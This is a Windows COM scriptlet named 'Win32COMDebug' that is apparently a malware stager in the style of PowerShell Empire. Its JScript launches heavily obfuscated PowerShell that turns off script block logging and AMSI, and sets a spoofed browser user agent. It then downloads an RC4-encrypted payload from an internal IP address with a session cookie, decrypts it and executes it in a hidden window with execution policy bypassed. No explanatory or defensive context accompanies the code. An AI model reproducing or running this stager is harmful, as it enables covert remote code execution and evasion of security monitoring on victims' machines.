<?XML version="1.0"?>
<scriptlet>
<registration
description="Win32COMDebug"
progid="Win32COMDebug"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
 >
 <script language="JScript">
      <![CDATA[
           var r = new ActiveXObject("WScript.Shell").Run('c:\winDoWS\SystEm32\Cmd.eXe  /C "sEt   eMv=   $X1tBf = [TyPE]("{0}{5}{2}{1}{6}{3}{4}{9}{10}{7}{8}" -F \'cOLlE\',\'gENeR\',\'ions.\',\'CTiON\',\'ary\',\'Ct\',\'ic.di\',\'tEM.obJe\',\'ct\',\'[\',\'stRinG,syS\') ;    $Cq5MLw =  [tYPe]("{1}{3}{0}{2}" -F\'Lo\',\'sC\',\'ck\',\'rIpTb\')  ;$VdXeT=  [TYpE]("{0}{1}" -f\'R\',\'eF\')  ;  $IwcJv6=[tyPE]("{3}{4}{1}{6}{5}{7}{0}{2}" -f\'tMaNAg\',\'StEm.\',\'ER\',\'S\',\'y\',\'epO\',\'NeT.SERViC\',\'IN\') ;   .("{2}{0}{1}"-f \'I\',\'TEm\',\'Set-\') (\'vARIa\'+\'b\'+\'Le:0JMzd\') ([tYPe]("{3}{1}{2}{0}" -F\'t.weBREqueST\',\'ST\',\'em.ne\',\'Sy\')  )  ;    .("{0}{1}{2}"-f \'SET\',\'-\',\'ITEM\') ("va"+"RiAbLE:uA6"+"dy"+"i") ([tYPE]("{3}{1}{2}{4}{5}{0}" -f\'nTialcAChe\',\'YSTEM.NE\',\'t.cR\',\'s\',\'e\',\'De\') ) ;   .("{1}{0}" -f\'ET\',\'s\')  g8ZyOX ([TyPe]("{3}{0}{2}{4}{1}" -f \'yS\',\'NG\',\'T\',\'s\',\'em.text.EnCodI\')  ) ;If(${pSVE`RsiO`NTaB`LE}."pSVer`s`ioN"."mA`jor" -Ge 3){${g`Pf}=  (  ^&(\'GI\') (\'V\'+\'Ar\'+\'iAb\'+\'LE:VdXET\')  ).VAlUe."AsS`EmB`Ly".("{0}{2}{1}" -f\'GETT\',\'E\',\'yp\').Invoke(("{3}{0}{5}{2}{1}{4}"-f\'ement.Autom\',\'l\',\'on.Uti\',\'System.Manag\',\'s\',\'ati\'))."GETFIE`Ld"(("{6}{1}{4}{3}{5}{2}{7}{0}"-f\'s\',\'ched\',\'licySetti\',\'oup\',\'Gr\',\'Po\',\'ca\',\'ng\'),\'N\'+("{1}{0}{2}{3}"-f\'Pub\',\'on\',\'lic,St\',\'atic\'));IF(${g`Pf}){${g`pC}=${g`Pf}.("{1}{0}{2}"-f \'eTV\',\'G\',\'aLue\').Invoke(${nu`Ll});If(${g`Pc}[("{0}{1}{2}" -f\'S\',\'crip\',\'tB\')+("{0}{2}{1}"-f\'lockL\',\'ng\',\'oggi\')]){${g`Pc}[("{1}{0}" -f \'ptB\',\'Scri\')+("{3}{1}{2}{0}" -f \'ng\',\'Log\',\'gi\',\'lock\')][("{2}{0}{3}{1}"-f \'leS\',\'B\',\'Enab\',\'cript\')+("{2}{0}{1}"-f \'gi\',\'ng\',\'lockLog\')]=0;${g`PC}[("{0}{1}{2}"-f\'Sc\',\'ript\',\'B\')+("{2}{0}{1}{3}"-f\'ckLogg\',\'in\',\'lo\',\'g\')][("{6}{3}{0}{4}{5}{1}{2}"-f\'bleSc\',\'o\',\'cationLogging\',\'na\',\'ript\',\'BlockInv\',\'E\')]=0}${V`AL}= (^&("{0}{2}{1}" -f \'Ch\',\'tEM\',\'ildI\') (\'v\'+\'ARIA\'+\'ble:x1TBf\')  ).valUe::("{0}{1}" -f \'nE\',\'W\').Invoke();${V`AL}.("{1}{0}"-f \'dD\',\'A\').Invoke(("{0}{3}{1}{2}{4}" -f \'En\',\'l\',\'eS\',\'ab\',\'criptB\')+("{0}{1}{2}"-f\'lockLoggi\',\'n\',\'g\'),0);${v`Al}.("{1}{0}"-f\'D\',\'Ad\').Invoke(("{0}{1}{4}{2}{3}{5}" -f\'En\',\'ableS\',\'kInv\',\'ocation\',\'criptBloc\',\'Logging\'),0);${g`pc}[((("{15}{3}{13}{2}{5}{21}{14}{9}{12}{22}{1}{8}{6}{20}{17}{18}{16}{19}{4}{0}{7}{10}{11}"-f\'wer\',\'o\',\'LOCAL\',\'KE\',\'76Po\',\'_\',\'B76\',\'ShellB\',\'licies\',\'HIN\',\'7\',\'6ScriptB\',\'EB76Softwa\',\'Y_\',\'AC\',\'H\',\'d\',\'icrosoftB76W\',\'in\',\'owsB\',\'M\',\'M\',\'reB76P\'))  -REPlace  ([CHAr]66+[CHAr]55+[CHAr]54),[CHAr]92)+("{1}{0}{2}{3}" -f \'i\',\'lockLogg\',\'n\',\'g\')]=${v`Al}}ElSE{ (  ^&("{1}{0}{2}"-f \'Ia\',\'vAr\',\'bLe\')  CQ5mlw ).vALUe."GETFie`lD"(("{1}{0}{2}"-f \'gnatur\',\'si\',\'es\'),\'N\'+("{2}{1}{0}"-f\'c\',\'lic,Stati\',\'onPub\')).("{1}{0}{2}"-f\'T\',\'SE\',\'VALue\').Invoke(${NU`lL},(^&("{0}{1}{2}"-f \'NEW-ObJe\',\'C\',\'T\') ("{6}{4}{8}{0}{2}{7}{3}{1}{5}{9}" -f\'NEri\',\'et[\',\'C.H\',\'S\',\'cTions.\',\'stRiNG\',\'COLlE\',\'aSh\',\'Ge\',\']\')))}  (  ^&(\'Gi\') (\'VaRIab\'+\'Le:vdX\'+\'et\') ).vALue."asSE`MB`ly".("{0}{1}"-f \'GeT\',\'TYPe\').Invoke(("{7}{9}{1}{3}{5}{8}{2}{0}{6}{4}"-f \'omation\',\'a\',\'t\',\'nagem\',\'tils\',\'e\',\'.AmsiU\',\'Sys\',\'nt.Au\',\'tem.M\'))^|.(\'?\'){${_}}^|.(\'%\'){${_}.("{0}{1}{2}"-f \'Ge\',\'TF\',\'iEld\').Invoke(("{2}{3}{1}{0}" -f\'ed\',\'il\',\'ams\',\'iInitFa\'),("{0}{2}{3}{1}"-f \'NonPubl\',\'c\',\'ic,St\',\'ati\')).("{1}{2}{0}" -f \'luE\',\'SE\',\'TVA\').Invoke(${NU`Ll},${TR`Ue})};};  $IWcjV6::"ex`pE`c`T100coN`TiNuE"=0;${W`c}=^&("{2}{1}{0}{3}"-f \'Je\',\'Ew-Ob\',\'N\',\'cT\') ("{0}{4}{3}{2}{1}" -f \'S\',\'nT\',\'CLie\',\'WEb\',\'YSTEM.NET.\');${u}=(("{0}{5}{15}{14}{8}{4}{13}{7}{9}{2}{3}{1}{12}{6}{10}{11}"-f \'Mozi\',\'; rv:1\',\'d\',\'ent/7.0\',\'NT\',\'l\',\'.\',\'; WOW64; Tr\',\'s \',\'i\',\'0) like G\',\'ecko\',\'1\',\' 6.1\',\'w\',\'la/5.0 (Windo\'));${W`c}."heade`RS".("{0}{1}"-f\'A\',\'dd\').Invoke(("{0}{2}{1}"-f\'Use\',\'t\',\'r-Agen\'),${u});${W`c}."pr`OxY"= $0JMZd::"DeFAuL`T`We`B`ProXY";${W`C}."Pr`oXy"."cR`ed`enTiaLS" =   (  ^&("{0}{2}{1}{3}"-f \'geT\',\'r\',\'-Va\',\'IaBLe\')  (\'Ua6Dy\'+\'I\') -vALUEoNLy)::"deFA`ULtn`eT`WORKc`ReDe`NT`I`ALS";${SC`R`ip`T:proXy} = ${W`c}."pro`Xy";${K}= $g8zyOx::"a`sCii".("{2}{0}{1}"-f \'tBy\',\'TeS\',\'GE\').Invoke(\'=9Bq)e@wA]+XvYO6aDm;Is^|b0l}74nd/\');${R}={${d},${k}=${aR`GS};${S}=0..255;0..255^|.(\'%\'){${J}=(${j}+${S}[${_}]+${K}[${_}%${K}."c`oUNt"])%256;${s}[${_}],${s}[${J}]=${s}[${J}],${S}[${_}]};${D}^|.(\'%\'){${i}=(${I}+1)%256;${h}=(${H}+${S}[${I}])%256;${S}[${i}],${s}[${h}]=${S}[${H}],${S}[${i}];${_}-bxOR${s}[(${S}[${I}]+${S}[${H}])%256]}};${S`er}=("{3}{2}{0}{4}{1}" -f \'.2\',\'0\',\'101\',\'http://10.100.\',\'21:8\');${t}=("{1}{0}{2}{3}{4}" -f \'in/p\',\'/log\',\'rocess\',\'.p\',\'hp\');${wc}."h`EAdE`Rs".("{0}{1}" -f\'A\',\'dD\').Invoke(("{0}{1}" -f \'Cook\',\'ie\'),("{7}{5}{3}{6}{8}{10}{0}{1}{2}{4}{9}"-f\'lhW49\',\'/\',\'W9y+3\',\'h\',\'c\',\'n=VGc8e\',\'ik\',\'sessio\',\'7aUf\',\'g=\',\'j4\'));${d`Ata}=${WC}.("{1}{0}{2}"-f\'lOadDa\',\'DOWN\',\'tA\').Invoke(${S`eR}+${T});${i`V}=${Da`TA}[0..3];${dA`Ta}=${da`Ta}[4..${DA`Ta}."L`EnGTH"];-JOIn[ChaR[]](^& ${r} ${D`Ata} (${I`V}+${K}))^|^&("{0}{1}" -f \'I\',\'EX\')  &&sEt  pdYF=echo INVoke-eXPResSiON  ([eNVIroNMEnT]::GetEnVIrOnMeNtVARIABLe(\'emv\',\'proCEss\'))  ^|  POweRsHell -nONINteraCtI  -NOE  -nOP -EXEcutIoNPo  bypASs  -wIndOwstY hiDDEN     - && c:\winDoWS\SystEm32\Cmd.eXe  /C%PDYF%"');
      ]]>
 </script>
</registration>
<public>
    <method name="Exec"></method>
</public>
</scriptlet>
